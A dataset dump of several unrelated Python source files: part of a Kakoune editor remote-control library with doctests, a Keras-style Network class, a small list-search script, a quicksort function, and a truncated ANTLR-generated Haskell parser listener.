return tuple(map(Args.coord, x.split(',')))
@staticmethod
def string(x):
"""
Parse a Kakoune string.
"""
return x
@staticmethod
def listof(p):
r"""
Parse a Kakoune list of p.
>>> import random
>>> def random_fragment():
... return ''.join(random.sample(':\\abc', random.randrange(1, 5)))
>>> def test(n):
... xs = [random_fragment() for _ in range(n)]
... if xs and xs[-1] == '':
... xs[-1] = 'c'
... exs = ':'.join(utils.backslash_escape('\\:', s) for s in xs)
... xs2 = Args.listof(Args.string)(exs)
... assert(xs == xs2)
>>> for n in range(0, 10):
... test(n)
"""
def rmlastcolon(s):
if s and s[-1] == ':':
return s[:-1]
else:
return s
def inner(s):
ms = [m.group(0)
for m in re.finditer(r'(.*?(?<!\\)(\\\\)*:|.+)', s)]
ms = [m if i == len(ms) - 1 else rmlastcolon(m)
for i, m in enumerate(ms)]
return [p(re.sub(r'\\(.)', '\g<1>', x)) for x in ms]
return inner
@staticmethod
def boolean(s):
"""
Parse a Kakoune boolean.
"""
return s == 'true'
@staticmethod
def args_parse(s):
return tuple(x.replace('_u', '_') for x in s.split('_S')[1:])
@staticmethod
def argsetup(argnames, config):
"""
>>> s, _ = Args.argsetup('client cmd reply'.split(), {'cmd': ('a', int)})
>>> print(s)
['kak_client', 'a']
"""
args = []
splices = []
for name in argnames:
try:
if name in config:
splice, parse = config[name]
else:
splice, parse = _arg_config[name]
splices.append(splice)
args.append((name, parse))
except KeyError:
pass
def parse(line):
_debug(argnames, line)
params = [v.replace('_n', '\n').replace('_u', '_')
for v in line.split('_s')]
return {name: parse(value)
for (name, parse), value in zip(args, params)}
return splices, parse
_arg_config = {
'line': ('kak_cursor_line', int),
'column': ('kak_cursor_column', int),
'aligntab': ('kak_opt_aligntab', Args.boolean),
'filetype': ('kak_opt_filetype', Args.string),
'indentwidth': ('kak_opt_indentwidth', int),
'readonly': ('kak_opt_readonly', Args.boolean),
'readonly': ('kak_opt_readonly', Args.boolean),
'tabstop': ('kak_opt_tabstop', int),
'completers': ('kak_opt_completers', Args.listof(Args.string)),
'pwd': ('PWD', Args.string),
'PWD': ('PWD', Args.string),
'PATH': ('PATH', Args.string),
'HOME': ('HOME', Args.string),
'args': ('__args', Args.args_parse),
'arg1': ('1', Args.string),
'arg2': ('2', Args.string),
'arg3': ('3', Args.string),
'arg4': ('4', Args.string),
'arg5': ('5', Args.string),
'arg6': ('6', Args.string),
'arg7': ('7', Args.string),
'arg8': ('8', Args.string),
'arg9': ('9', Args.string),
'bufname': ('kak_bufname', Args.string),
'buffile': ('kak_buffile', Args.string),
'buflist': ('kak_buflist', Args.listof(Args.string)),
'timestamp': ('kak_timestamp', int),
'selection': ('kak_selection', Args.string),
'selections': ('kak_selections', Args.listof(Args.string)),
'runtime': ('kak_runtime', Args.string),
'session': ('kak_session', Args.string),
'client': ('kak_client', Args.string),
'cursor_line': ('kak_cursor_line', int),
'cursor_column': ('kak_cursor_column', int),
'cursor_char_column': ('kak_cursor_char_column', int),
'cursor_byte_offset': ('kak_cursor_byte_offset', int),
'selection_desc': ('kak_selection_desc', Args.selection_desc),
'selections_desc': ('kak_selections_desc', Args.listof(Args.selection_desc)),
'window_width': ('kak_window_width', int),
'window_height': ('kak_window_height', int),
}
#############################################################################
# Private utils
def _mkfifo(active_fifos={}):
"""
Return a pair of a new fifo' filename and a cleanup function.
"""
fifo_dir = tempfile.mkdtemp()
fifo = os.path.join(fifo_dir, 'fifo')
os.mkfifo(fifo)
def rm():
del active_fifos[fifo]
os.remove(fifo)
os.rmdir(fifo_dir)
active_fifos[fifo] = rm
return fifo, rm
def _fifo_cleanup():
"""
Writes _q to all open fifos created by _mkfifo.
"""
for x in list(six.iterkeys(_mkfifo.__defaults__[0])):
with open(x, 'w') as fd:
fd.write('_q\n')
fd.flush()
def _debug(*xs):
if '-d' in sys.argv[1:]:
print(*xs, file=sys.stderr)
#############################################################################
# Tests
def headless(ui='dummy', stdout=None):
"""
Start a headless Kakoune process.
"""
p = Popen(['kak', '-n', '-ui', ui], stdout=stdout)
time.sleep(0.01)
return p
def _test_remote_commands_sync():
u"""
>>> kak = headless()
>>> @Remote.command(kak.pid, sync_setup=True)
... def write_position(line, column, pipe):
... pipe(utils.join(('exec ', 'a', str(line), ':', str(column), '<esc>'), sep=''), sync=True)
>>> pipe(kak.pid, 'write-position', 'unnamed0', sync=True)
>>> pipe(kak.pid, 'exec a,<space><esc>', 'unnamed0', sync=True)
>>> write_position('unnamed0')
>>> pipe(kak.pid, 'exec \%H', 'unnamed0', sync=True)
>>> print(Remote.onclient(kak.pid, 'unnamed0')(
... lambda selection: selection))
1:1, 1:5
>>> r = Remote(kak.pid)
>>> r.puns = False
>>> r.required_names.add('selection')
>>> print(r.onclient(r, 'unnamed0', sync=True)(lambda d: d['selection']))
1:1, 1:5
>>> q = Queue()
>>> Remote.onclient(kak.pid, 'unnamed0', sync=False)(
... lambda selection: q.put(selection))
>>> print(q.get())
1:1, 1:5
>>> pipe(kak.pid, 'quit!', 'unnamed0')
>>> kak.wait()
0
>>> _fifo_cleanup()
"""
pass
def _test_unicode_and_escaping():
u"""
>>> kak = headless()
>>> pipe(kak.pid, u'exec iapa_bepa<ret>åäö_s_u_n<esc>%H', 'unnamed0')
>>> call = Remote.onclient(kak.pid, 'unnamed0')
>>> print(call(lambda selection: selection))
apa_bepa
åäö_s_u_n
>>> print(call(lambda selection_desc: selection_desc))
((1, 1), (2, 12))
>>> pipe(kak.pid, 'quit!', 'unnamed0')
>>> kak.wait()
0
>>> _fifo_cleanup()
"""
pass
def _test_remote_commands_async():
u"""
>>> kak = headless()
>>> @Remote.command(kak.pid)
... def write_position(pipe, line, column):
... pipe(utils.join(('exec ', 'a', str(line), ':', str(column), '<esc>'), sep=''))
>>> pipe(kak.pid, 'write-position', 'unnamed0')
>>> time.sleep(0.05)
>>> pipe(kak.pid, 'exec a,<space><esc>', 'unnamed0', sync=True)
>>> time.sleep(0.02)
>>> write_position('unnamed0')
>>> pipe(kak.pid, 'exec \%H', 'unnamed0', sync=True)
>>> Remote.onclient(kak.pid, 'unnamed0')(lambda selection: print(selection))
1:1, 1:5
>>> q = Queue()
>>> Remote.onclient(kak.pid, 'unnamed0', sync=False)(lambda selection: q.put(selection))
>>> print(q.get())
1:1, 1:5
>>> pipe(kak.pid, 'quit!', 'unnamed0')
>>> kak.wait()
0
>>> _fifo_cleanup()
"""
pass
def _test_commands_with_params():
u"""
>>> kak = headless()
>>> @Remote.command(kak.pid, params='2..', sync_python_calls=True)
... def test(arg1, arg2, args):
... print(', '.join((arg1, arg2) + args[2:]))
>>> test(None, 'one', 'two', 'three', 'four')
one, two, three, four
>>> test(None, 'a\\nb', 'c_d', 'e_sf', 'g_u_n__ __n_S_s__Sh')
a
b, c_d, e_sf, g_u_n__ __n_S_s__Sh
>>> pipe(kak.pid, "test 'a\\nb' c_d e_sf 'g_u_n__ __n_S_s__Sh'", sync=True)
a
b, c_d, e_sf, g_u_n__ __n_S_s__Sh
>>> pipe(kak.pid, 'quit!', 'unnamed0')
>>> kak.wait()
0
>>> _fifo_cleanup()
"""
pass
#############################################################################
# Main
if __name__ == '__main__':
import doctest
doctest.testmod()
|
nilq/baby-python
|
python
|
# ------------------------------------------------------------
# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.
#
# Licensed under the BSD 2-Clause License.
# You should have received a copy of the BSD 2-Clause License
# along with the software. If not, See,
#
# <https://opensource.org/licenses/BSD-2-Clause>
#
# Codes are based on:
#
# <https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/keras/engine/network.py>
#
# ------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from dragon.core.util import nest
from dragon.vm.tensorflow.core.keras.engine import base_layer
class Network(base_layer.Layer):
"""Compose a group of layers."""
def __init__(self, *args, **kwargs):
super(Network, self).__init__(**kwargs)
self._thread_local = threading.local()
self._is_compiled = False
self._updates = []
self._losses = []
self._metrics = []
self.inputs = []
self.outputs = []
if not hasattr(self, 'optimizer'):
self.optimizer = None
if (len(args) == 2 or
len(args) == 1 and 'outputs' in kwargs or
'inputs' in kwargs and 'outputs' in kwargs):
self._init_graph_network(*args, **kwargs)
else:
self._init_subclassed_network(**kwargs)
def _init_graph_network(self, inputs, outputs, **kwargs):
self._is_graph_network = True
if isinstance(inputs, list) and len(nest.flatten(inputs)) == 1:
inputs = inputs[0]
if isinstance(outputs, list) and len(nest.flatten(outputs)) == 1:
outputs = outputs[0]
self._nested_outputs = outputs
self._nested_inputs = inputs
self.inputs = nest.flatten(inputs)
self.outputs = nest.flatten(outputs)
self.built = True
def _init_subclassed_network(self, **kwargs):
self._is_graph_network = False
self.built = False
|
nilq/baby-python
|
python
|
n,a=map(int,input().split())
arr=list(map(int,input().split()))
if a in arr:
print("yes")
else:
print("no")
|
nilq/baby-python
|
python
|
def quicksort(list):
if len(list) <= 1:
return list
pivot = list[0]
lesser = [item for item in list if item < pivot]
pivots = [item for item in list if item == pivot]
greater = [item for item in list if item > pivot]
lesser = quicksort(lesser)
greater = quicksort(greater)
return lesser + pivots + greater
|
nilq/baby-python
|
python
|
# Generated from HaskellParser.g4 by ANTLR 4.9.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .HaskellParser import HaskellParser
else:
from HaskellParser import HaskellParser
# This class defines a complete listener for a parse tree produced by HaskellParser.
class HaskellParserListener(ParseTreeListener):
# Enter a parse tree produced by HaskellParser#module.
def enterModule(self, ctx:HaskellParser.ModuleContext):
pass
# Exit a parse tree produced by HaskellParser#module.
def exitModule(self, ctx:HaskellParser.ModuleContext):
pass
# Enter a parse tree produced by HaskellParser#module_content.
def enterModule_content(self, ctx:HaskellParser.Module_contentContext):
pass
# Exit a parse tree produced by HaskellParser#module_content.
def exitModule_content(self, ctx:HaskellParser.Module_contentContext):
pass
# Enter a parse tree produced by HaskellParser#where_module.
def enterWhere_module(self, ctx:HaskellParser.Where_moduleContext):
pass
# Exit a parse tree produced by HaskellParser#where_module.
def exitWhere_module(self, ctx:HaskellParser.Where_moduleContext):
pass
# Enter a parse tree produced by HaskellParser#module_body.
def enterModule_body(self, ctx:HaskellParser.Module_bodyContext):
pass
# Exit a parse tree produced by HaskellParser#module_body.
def exitModule_body(self, ctx:HaskellParser.Module_bodyContext):
pass
# Enter a parse tree produced by HaskellParser#pragmas.
def enterPragmas(self, ctx:HaskellParser.PragmasContext):
pass
# Exit a parse tree produced by HaskellParser#pragmas.
def exitPragmas(self, ctx:HaskellParser.PragmasContext):
pass
# Enter a parse tree produced by HaskellParser#pragma.
def enterPragma(self, ctx:HaskellParser.PragmaContext):
pass
# Exit a parse tree produced by HaskellParser#pragma.
def exitPragma(self, ctx:HaskellParser.PragmaContext):
pass
# Enter a parse tree produced by HaskellParser#language_pragma.
def enterLanguage_pragma(self, ctx:HaskellParser.Language_pragmaContext):
pass
# Exit a parse tree produced by HaskellParser#language_pragma.
def exitLanguage_pragma(self, ctx:HaskellParser.Language_pragmaContext):
pass
# Enter a parse tree produced by HaskellParser#options_ghc.
def enterOptions_ghc(self, ctx:HaskellParser.Options_ghcContext):
pass
# Exit a parse tree produced by HaskellParser#options_ghc.
def exitOptions_ghc(self, ctx:HaskellParser.Options_ghcContext):
pass
# Enter a parse tree produced by HaskellParser#simple_options.
def enterSimple_options(self, ctx:HaskellParser.Simple_optionsContext):
pass
# Exit a parse tree produced by HaskellParser#simple_options.
def exitSimple_options(self, ctx:HaskellParser.Simple_optionsContext):
pass
# Enter a parse tree produced by HaskellParser#extension.
def enterExtension(self, ctx:HaskellParser.ExtensionContext):
pass
# Exit a parse tree produced by HaskellParser#extension.
def exitExtension(self, ctx:HaskellParser.ExtensionContext):
pass
# Enter a parse tree produced by HaskellParser#body.
def enterBody(self, ctx:HaskellParser.BodyContext):
pass
# Exit a parse tree produced by HaskellParser#body.
def exitBody(self, ctx:HaskellParser.BodyContext):
pass
# Enter a parse tree produced by HaskellParser#impdecls.
def enterImpdecls(self, ctx:HaskellParser.ImpdeclsContext):
pass
# Exit a parse tree produced by HaskellParser#impdecls.
def exitImpdecls(self, ctx:HaskellParser.ImpdeclsContext):
pass
# Enter a parse tree produced by HaskellParser#exports.
def enterExports(self, ctx:HaskellParser.ExportsContext):
pass
# Exit a parse tree produced by HaskellParser#exports.
def exitExports(self, ctx:HaskellParser.ExportsContext):
pass
# Enter a parse tree produced by HaskellParser#exprt.
def enterExprt(self, ctx:HaskellParser.ExprtContext):
pass
# Exit a parse tree produced by HaskellParser#exprt.
def exitExprt(self, ctx:HaskellParser.ExprtContext):
pass
# Enter a parse tree produced by HaskellParser#impdecl.
def enterImpdecl(self, ctx:HaskellParser.ImpdeclContext):
pass
# Exit a parse tree produced by HaskellParser#impdecl.
def exitImpdecl(self, ctx:HaskellParser.ImpdeclContext):
pass
# Enter a parse tree produced by HaskellParser#impspec.
def enterImpspec(self, ctx:HaskellParser.ImpspecContext):
pass
# Exit a parse tree produced by HaskellParser#impspec.
def exitImpspec(self, ctx:HaskellParser.ImpspecContext):
pass
# Enter a parse tree produced by HaskellParser#himport.
def enterHimport(self, ctx:HaskellParser.HimportContext):
pass
# Exit a parse tree produced by HaskellParser#himport.
def exitHimport(self, ctx:HaskellParser.HimportContext):
pass
# Enter a parse tree produced by HaskellParser#cname.
def enterCname(self, ctx:HaskellParser.CnameContext):
pass
# Exit a parse tree produced by HaskellParser#cname.
def exitCname(self, ctx:HaskellParser.CnameContext):
pass
# Enter a parse tree produced by HaskellParser#fixity.
def enterFixity(self, ctx:HaskellParser.FixityContext):
pass
# Exit a parse tree produced by HaskellParser#fixity.
def exitFixity(self, ctx:HaskellParser.FixityContext):
pass
# Enter a parse tree produced by HaskellParser#ops.
def enterOps(self, ctx:HaskellParser.OpsContext):
pass
# Exit a parse tree produced by HaskellParser#ops.
def exitOps(self, ctx:HaskellParser.OpsContext):
pass
# Enter a parse tree produced by HaskellParser#topdecls.
def enterTopdecls(self, ctx:HaskellParser.TopdeclsContext):
pass
# Exit a parse tree produced by HaskellParser#topdecls.
def exitTopdecls(self, ctx:HaskellParser.TopdeclsContext):
pass
# Enter a parse tree produced by HaskellParser#topdecl.
def enterTopdecl(self, ctx:HaskellParser.TopdeclContext):
pass
# Exit a parse tree produced by HaskellParser#topdecl.
def exitTopdecl(self, ctx:HaskellParser.TopdeclContext):
pass
# Enter a parse tree produced by HaskellParser#cl_decl.
def enterCl_decl(self, ctx:HaskellParser.Cl_declContext):
pass
# Exit a parse tree produced by HaskellParser#cl_decl.
def exitCl_decl(self, ctx:HaskellParser.Cl_declContext):
pass
# Enter a parse tree produced by HaskellParser#ty_decl.
def enterTy_decl(self, ctx:HaskellParser.Ty_declContext):
pass
# Exit a parse tree produced by HaskellParser#ty_decl.
def exitTy_decl(self, ctx:HaskellParser.Ty_declContext):
pass
# Enter a parse tree produced by HaskellParser#standalone_kind_sig.
def enterStandalone_kind_sig(self, ctx:HaskellParser.Standalone_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#standalone_kind_sig.
def exitStandalone_kind_sig(self, ctx:HaskellParser.Standalone_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#sks_vars.
def enterSks_vars(self, ctx:HaskellParser.Sks_varsContext):
pass
# Exit a parse tree produced by HaskellParser#sks_vars.
def exitSks_vars(self, ctx:HaskellParser.Sks_varsContext):
pass
# Enter a parse tree produced by HaskellParser#inst_decl.
def enterInst_decl(self, ctx:HaskellParser.Inst_declContext):
pass
# Exit a parse tree produced by HaskellParser#inst_decl.
def exitInst_decl(self, ctx:HaskellParser.Inst_declContext):
pass
# Enter a parse tree produced by HaskellParser#overlap_pragma.
def enterOverlap_pragma(self, ctx:HaskellParser.Overlap_pragmaContext):
pass
# Exit a parse tree produced by HaskellParser#overlap_pragma.
def exitOverlap_pragma(self, ctx:HaskellParser.Overlap_pragmaContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_strategy_no_via.
def enterDeriv_strategy_no_via(self, ctx:HaskellParser.Deriv_strategy_no_viaContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_strategy_no_via.
def exitDeriv_strategy_no_via(self, ctx:HaskellParser.Deriv_strategy_no_viaContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_strategy_via.
def enterDeriv_strategy_via(self, ctx:HaskellParser.Deriv_strategy_viaContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_strategy_via.
def exitDeriv_strategy_via(self, ctx:HaskellParser.Deriv_strategy_viaContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_standalone_strategy.
def enterDeriv_standalone_strategy(self, ctx:HaskellParser.Deriv_standalone_strategyContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_standalone_strategy.
def exitDeriv_standalone_strategy(self, ctx:HaskellParser.Deriv_standalone_strategyContext):
pass
# Enter a parse tree produced by HaskellParser#opt_injective_info.
def enterOpt_injective_info(self, ctx:HaskellParser.Opt_injective_infoContext):
pass
# Exit a parse tree produced by HaskellParser#opt_injective_info.
def exitOpt_injective_info(self, ctx:HaskellParser.Opt_injective_infoContext):
pass
# Enter a parse tree produced by HaskellParser#injectivity_cond.
def enterInjectivity_cond(self, ctx:HaskellParser.Injectivity_condContext):
pass
# Exit a parse tree produced by HaskellParser#injectivity_cond.
def exitInjectivity_cond(self, ctx:HaskellParser.Injectivity_condContext):
pass
# Enter a parse tree produced by HaskellParser#inj_varids.
def enterInj_varids(self, ctx:HaskellParser.Inj_varidsContext):
pass
# Exit a parse tree produced by HaskellParser#inj_varids.
def exitInj_varids(self, ctx:HaskellParser.Inj_varidsContext):
pass
# Enter a parse tree produced by HaskellParser#where_type_family.
def enterWhere_type_family(self, ctx:HaskellParser.Where_type_familyContext):
pass
# Exit a parse tree produced by HaskellParser#where_type_family.
def exitWhere_type_family(self, ctx:HaskellParser.Where_type_familyContext):
pass
# Enter a parse tree produced by HaskellParser#ty_fam_inst_eqn_list.
def enterTy_fam_inst_eqn_list(self, ctx:HaskellParser.Ty_fam_inst_eqn_listContext):
pass
# Exit a parse tree produced by HaskellParser#ty_fam_inst_eqn_list.
def exitTy_fam_inst_eqn_list(self, ctx:HaskellParser.Ty_fam_inst_eqn_listContext):
pass
# Enter a parse tree produced by HaskellParser#ty_fam_inst_eqns.
def enterTy_fam_inst_eqns(self, ctx:HaskellParser.Ty_fam_inst_eqnsContext):
pass
# Exit a parse tree produced by HaskellParser#ty_fam_inst_eqns.
def exitTy_fam_inst_eqns(self, ctx:HaskellParser.Ty_fam_inst_eqnsContext):
pass
# Enter a parse tree produced by HaskellParser#ty_fam_inst_eqn.
def enterTy_fam_inst_eqn(self, ctx:HaskellParser.Ty_fam_inst_eqnContext):
pass
# Exit a parse tree produced by HaskellParser#ty_fam_inst_eqn.
def exitTy_fam_inst_eqn(self, ctx:HaskellParser.Ty_fam_inst_eqnContext):
pass
# Enter a parse tree produced by HaskellParser#at_decl_cls.
def enterAt_decl_cls(self, ctx:HaskellParser.At_decl_clsContext):
pass
# Exit a parse tree produced by HaskellParser#at_decl_cls.
def exitAt_decl_cls(self, ctx:HaskellParser.At_decl_clsContext):
pass
# Enter a parse tree produced by HaskellParser#at_decl_inst.
def enterAt_decl_inst(self, ctx:HaskellParser.At_decl_instContext):
pass
# Exit a parse tree produced by HaskellParser#at_decl_inst.
def exitAt_decl_inst(self, ctx:HaskellParser.At_decl_instContext):
pass
# Enter a parse tree produced by HaskellParser#opt_kind_sig.
def enterOpt_kind_sig(self, ctx:HaskellParser.Opt_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_kind_sig.
def exitOpt_kind_sig(self, ctx:HaskellParser.Opt_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_datafam_kind_sig.
def enterOpt_datafam_kind_sig(self, ctx:HaskellParser.Opt_datafam_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_datafam_kind_sig.
def exitOpt_datafam_kind_sig(self, ctx:HaskellParser.Opt_datafam_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_tyfam_kind_sig.
def enterOpt_tyfam_kind_sig(self, ctx:HaskellParser.Opt_tyfam_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_tyfam_kind_sig.
def exitOpt_tyfam_kind_sig(self, ctx:HaskellParser.Opt_tyfam_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_at_kind_inj_sig.
def enterOpt_at_kind_inj_sig(self, ctx:HaskellParser.Opt_at_kind_inj_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_at_kind_inj_sig.
def exitOpt_at_kind_inj_sig(self, ctx:HaskellParser.Opt_at_kind_inj_sigContext):
pass
# Enter a parse tree produced by HaskellParser#tycl_hdr.
def enterTycl_hdr(self, ctx:HaskellParser.Tycl_hdrContext):
pass
# Exit a parse tree produced by HaskellParser#tycl_hdr.
def exitTycl_hdr(self, ctx:HaskellParser.Tycl_hdrContext):
pass
# Enter a parse tree produced by HaskellParser#tycl_hdr_inst.
def enterTycl_hdr_inst(self, ctx:HaskellParser.Tycl_hdr_instContext):
pass
# Exit a parse tree produced by HaskellParser#tycl_hdr_inst.
def exitTycl_hdr_inst(self, ctx:HaskellParser.Tycl_hdr_instContext):
pass
# Enter a parse tree produced by HaskellParser#capi_ctype.
def enterCapi_ctype(self, ctx:HaskellParser.Capi_ctypeContext):
pass
# Exit a parse tree produced by HaskellParser#capi_ctype.
def exitCapi_ctype(self, ctx:HaskellParser.Capi_ctypeContext):
pass
# Enter a parse tree produced by HaskellParser#standalone_deriving.
def enterStandalone_deriving(self, ctx:HaskellParser.Standalone_derivingContext):
pass
# Exit a parse tree produced by HaskellParser#standalone_deriving.
def exitStandalone_deriving(self, ctx:HaskellParser.Standalone_derivingContext):
pass
# Enter a parse tree produced by HaskellParser#role_annot.
def enterRole_annot(self, ctx:HaskellParser.Role_annotContext):
pass
# Exit a parse tree produced by HaskellParser#role_annot.
def exitRole_annot(self, ctx:HaskellParser.Role_annotContext):
pass
# Enter a parse tree produced by HaskellParser#roles.
def enterRoles(self, ctx:HaskellParser.RolesContext):
pass
# Exit a parse tree produced by HaskellParser#roles.
def exitRoles(self, ctx:HaskellParser.RolesContext):
pass
# Enter a parse tree produced by HaskellParser#role.
def enterRole(self, ctx:HaskellParser.RoleContext):
pass
# Exit a parse tree produced by HaskellParser#role.
def exitRole(self, ctx:HaskellParser.RoleContext):
pass
# Enter a parse tree produced by HaskellParser#pattern_synonym_decl.
def enterPattern_synonym_decl(self, ctx:HaskellParser.Pattern_synonym_declContext):
pass
# Exit a parse tree produced by HaskellParser#pattern_synonym_decl.
def exitPattern_synonym_decl(self, ctx:HaskellParser.Pattern_synonym_declContext):
pass
# Enter a parse tree produced by HaskellParser#pattern_synonym_lhs.
def enterPattern_synonym_lhs(self, ctx:HaskellParser.Pattern_synonym_lhsContext):
pass
# Exit a parse tree produced by HaskellParser#pattern_synonym_lhs.
def exitPattern_synonym_lhs(self, ctx:HaskellParser.Pattern_synonym_lhsContext):
pass
# Enter a parse tree produced by HaskellParser#hvars.
def enterHvars(self, ctx:HaskellParser.HvarsContext):
pass
# Exit a parse tree produced by HaskellParser#hvars.
def exitHvars(self, ctx:HaskellParser.HvarsContext):
pass
# Enter a parse tree produced by HaskellParser#cvars.
def enterCvars(self, ctx:HaskellParser.CvarsContext):
pass
# Exit a parse tree produced by HaskellParser#cvars.
def exitCvars(self, ctx:HaskellParser.CvarsContext):
pass
# Enter a parse tree produced by HaskellParser#where_decls.
def enterWhere_decls(self, ctx:HaskellParser.Where_declsContext):
pass
# Exit a parse tree produced by HaskellParser#where_decls.
def exitWhere_decls(self, ctx:HaskellParser.Where_declsContext):
pass
# Enter a parse tree produced by HaskellParser#pattern_synonym_sig.
def enterPattern_synonym_sig(self, ctx:HaskellParser.Pattern_synonym_sigContext):
pass
# Exit a parse tree produced by HaskellParser#pattern_synonym_sig.
def exitPattern_synonym_sig(self, ctx:HaskellParser.Pattern_synonym_sigContext):
pass
# Enter a parse tree produced by HaskellParser#decl_cls.
def enterDecl_cls(self, ctx:HaskellParser.Decl_clsContext):
pass
# Exit a parse tree produced by HaskellParser#decl_cls.
def exitDecl_cls(self, ctx:HaskellParser.Decl_clsContext):
pass
# Enter a parse tree produced by HaskellParser#decls_cls.
def enterDecls_cls(self, ctx:HaskellParser.Decls_clsContext):
pass
# Exit a parse tree produced by HaskellParser#decls_cls.
def exitDecls_cls(self, ctx:HaskellParser.Decls_clsContext):
pass
# Enter a parse tree produced by HaskellParser#decllist_cls.
def enterDecllist_cls(self, ctx:HaskellParser.Decllist_clsContext):
pass
# Exit a parse tree produced by HaskellParser#decllist_cls.
def exitDecllist_cls(self, ctx:HaskellParser.Decllist_clsContext):
pass
# Enter a parse tree produced by HaskellParser#where_cls.
def enterWhere_cls(self, ctx:HaskellParser.Where_clsContext):
pass
# Exit a parse tree produced by HaskellParser#where_cls.
def exitWhere_cls(self, ctx:HaskellParser.Where_clsContext):
pass
# Enter a parse tree produced by HaskellParser#decl_inst.
def enterDecl_inst(self, ctx:HaskellParser.Decl_instContext):
pass
# Exit a parse tree produced by HaskellParser#decl_inst.
def exitDecl_inst(self, ctx:HaskellParser.Decl_instContext):
pass
# Enter a parse tree produced by HaskellParser#decls_inst.
def enterDecls_inst(self, ctx:HaskellParser.Decls_instContext):
pass
# Exit a parse tree produced by HaskellParser#decls_inst.
def exitDecls_inst(self, ctx:HaskellParser.Decls_instContext):
pass
# Enter a parse tree produced by HaskellParser#decllist_inst.
def enterDecllist_inst(self, ctx:HaskellParser.Decllist_instContext):
pass
# Exit a parse tree produced by HaskellParser#decllist_inst.
def exitDecllist_inst(self, ctx:HaskellParser.Decllist_instContext):
pass
# Enter a parse tree produced by HaskellParser#where_inst.
def enterWhere_inst(self, ctx:HaskellParser.Where_instContext):
pass
# Exit a parse tree produced by HaskellParser#where_inst.
def exitWhere_inst(self, ctx:HaskellParser.Where_instContext):
pass
# Enter a parse tree produced by HaskellParser#decls.
def enterDecls(self, ctx:HaskellParser.DeclsContext):
pass
# Exit a parse tree produced by HaskellParser#decls.
def exitDecls(self, ctx:HaskellParser.DeclsContext):
pass
# Enter a parse tree produced by HaskellParser#decllist.
def enterDecllist(self, ctx:HaskellParser.DecllistContext):
pass
# Exit a parse tree produced by HaskellParser#decllist.
def exitDecllist(self, ctx:HaskellParser.DecllistContext):
pass
# Enter a parse tree produced by HaskellParser#binds.
def enterBinds(self, ctx:HaskellParser.BindsContext):
pass
# Exit a parse tree produced by HaskellParser#binds.
def exitBinds(self, ctx:HaskellParser.BindsContext):
pass
# Enter a parse tree produced by HaskellParser#wherebinds.
def enterWherebinds(self, ctx:HaskellParser.WherebindsContext):
pass
# Exit a parse tree produced by HaskellParser#wherebinds.
def exitWherebinds(self, ctx:HaskellParser.WherebindsContext):
pass
# Enter a parse tree produced by HaskellParser#rules.
def enterRules(self, ctx:HaskellParser.RulesContext):
pass
# Exit a parse tree produced by HaskellParser#rules.
def exitRules(self, ctx:HaskellParser.RulesContext):
pass
# Enter a parse tree produced by HaskellParser#pragma_rule.
def enterPragma_rule(self, ctx:HaskellParser.Pragma_ruleContext):
pass
# Exit a parse tree produced by HaskellParser#pragma_rule.
def exitPragma_rule(self, ctx:HaskellParser.Pragma_ruleContext):
pass
# Enter a parse tree produced by HaskellParser#rule_activation_marker.
def enterRule_activation_marker(self, ctx:HaskellParser.Rule_activation_markerContext):
pass
# Exit a parse tree produced by HaskellParser#rule_activation_marker.
def exitRule_activation_marker(self, ctx:HaskellParser.Rule_activation_markerContext):
pass
# Enter a parse tree produced by HaskellParser#rule_activation.
def enterRule_activation(self, ctx:HaskellParser.Rule_activationContext):
pass
# Exit a parse tree produced by HaskellParser#rule_activation.
def exitRule_activation(self, ctx:HaskellParser.Rule_activationContext):
pass
# Enter a parse tree produced by HaskellParser#rule_foralls.
def enterRule_foralls(self, ctx:HaskellParser.Rule_forallsContext):
pass
# Exit a parse tree produced by HaskellParser#rule_foralls.
def exitRule_foralls(self, ctx:HaskellParser.Rule_forallsContext):
pass
# Enter a parse tree produced by HaskellParser#rule_vars.
def enterRule_vars(self, ctx:HaskellParser.Rule_varsContext):
pass
# Exit a parse tree produced by HaskellParser#rule_vars.
def exitRule_vars(self, ctx:HaskellParser.Rule_varsContext):
pass
# Enter a parse tree produced by HaskellParser#rule_var.
def enterRule_var(self, ctx:HaskellParser.Rule_varContext):
pass
# Exit a parse tree produced by HaskellParser#rule_var.
def exitRule_var(self, ctx:HaskellParser.Rule_varContext):
pass
# Enter a parse tree produced by HaskellParser#warnings.
def enterWarnings(self, ctx:HaskellParser.WarningsContext):
pass
# Exit a parse tree produced by HaskellParser#warnings.
def exitWarnings(self, ctx:HaskellParser.WarningsContext):
pass
# Enter a parse tree produced by HaskellParser#pragma_warning.
def enterPragma_warning(self, ctx:HaskellParser.Pragma_warningContext):
pass
# Exit a parse tree produced by HaskellParser#pragma_warning.
def exitPragma_warning(self, ctx:HaskellParser.Pragma_warningContext):
pass
# Enter a parse tree produced by HaskellParser#deprecations.
def enterDeprecations(self, ctx:HaskellParser.DeprecationsContext):
pass
# Exit a parse tree produced by HaskellParser#deprecations.
def exitDeprecations(self, ctx:HaskellParser.DeprecationsContext):
pass
# Enter a parse tree produced by HaskellParser#pragma_deprecation.
def enterPragma_deprecation(self, ctx:HaskellParser.Pragma_deprecationContext):
pass
# Exit a parse tree produced by HaskellParser#pragma_deprecation.
def exitPragma_deprecation(self, ctx:HaskellParser.Pragma_deprecationContext):
pass
# Enter a parse tree produced by HaskellParser#strings.
def enterStrings(self, ctx:HaskellParser.StringsContext):
pass
# Exit a parse tree produced by HaskellParser#strings.
def exitStrings(self, ctx:HaskellParser.StringsContext):
